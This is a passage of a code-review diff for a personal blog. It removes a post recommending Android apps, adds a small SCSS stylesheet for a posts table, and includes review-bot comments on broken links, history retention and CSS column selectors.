- PotatoProject which is a custom Android rom, and there were plans for an open
- source notes sync server that you could host yourself, but I haven't seen
- that pop up yet.
-
- The app is written in Flutter, and did have choppy scrolling animations on my
- old phone. I'm not sure if that was a bug or my old phone just being
- underpowered, but it's something I want to mention anyways.
-
-- **Weather**: [geometric
- weather](https://f-droid.org/en/packages/wangdaye.com.geometricweather/).
- It's really good. Good animations, live wallpaper, fast, etc.
-
-- **RSS Reader**: [tiny tiny
- rss](https://www.f-droid.org/en/packages/org.fox.tttrss/). This app requires
- that you host your own tiny tiny rss server, but I do and the app works
- great!
-
-- **Myanimelist client**: [moelist](https://github.com/axiel7/MoeList). I don't
- know how I found this app but it's a real gem. If you use MAL you should
- download this app.
-
-- **PDF reader**: [pdf viewer
- plus](https://f-droid.org/en/packages/com.gsnathan.pdfviewer/). This is the
- only one that's actually decent. Good UI, good UX, pretty fast rendering.
- 9/10
-
-### Requires root
-
-- **Ad-blocker**: [adaway](https://adaway.org/). It does have a rootless mode,
- though the app warns you that it's slower and impacts your battery life
- negatively.
-
-- **Theme engine**: [substratum](https://github.com/substratum/substratum).
- Substratum requires root on android 9+, unless you're on stock samsung (one
- ui). Android 8 and under users can buy
- [andromeda](https://play.google.com/store/apps/details?id=projekt.andromeda).
- Samsung users can buy
- [synergy](https://play.google.com/store/apps/details?id=projekt.samsung.theme.compiler).
- They're both developed by the same people behind substratum, but they're not
- open source.
-
-### Closed source
-
-- **Reddit client**:
- [sync](https://play.google.com/store/apps/details?id=com.laurencedawson.reddit_sync)
-
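Review bot: this deletion drops the whole post with no replacement visible in this view, which is limited to `posts/`, so it is worth confirming the text now lives elsewhere in the tree before merging. If it does, the in-site link `[the whole spiel](/post/homeauto)` in the home assistant entry should be checked against the new post URLs, since the diffstat lists `posts/homeauto.md` as changed in this commit too. Note also that the removed Git and SFTP sections name the server's account layout (`media`, `sftp`, the chroot paths); they stay readable in the repository history after this commit, so the deletion alone does not retract them if that was the intent.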
diff --git a/posts/style.scss b/posts/style.scss
new file mode 100644
index 0000000..b1a363f
--- /dev/null
+++ b/posts/style.scss
@@ -0,0 +1,19 @@
+---
+---
+
+// fill width
+#posts {
+ table-layout: auto;
+ width: 100%;
+}
+
+// fit date column
+#posts td:nth-child(1),
+#posts th:nth-child(1) {
+ white-space: nowrap;
+ width: 1%;
+}
+
+// dates with table numerals
+#posts td:nth-child(1) { font-feature-settings: "tnum"; }
+
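Review bot: the `#posts td:nth-child(1)` and `#posts th:nth-child(1)` rules assume the date is always the first column, but the same commit adds both `posts/by-date.md` and `posts/by-title.md`; if the include renders the title first for the title-sorted listing, `white-space: nowrap; width: 1%;` and the tabular numerals will land on the title column instead. Putting a class on the date cell in the include and selecting on that would keep the styling tied to the date regardless of column order. As a smaller style point, `font-variant-numeric: tabular-nums;` is the higher-level property for what `font-feature-settings: "tnum";` does here and does not reset other feature settings inherited by the cell.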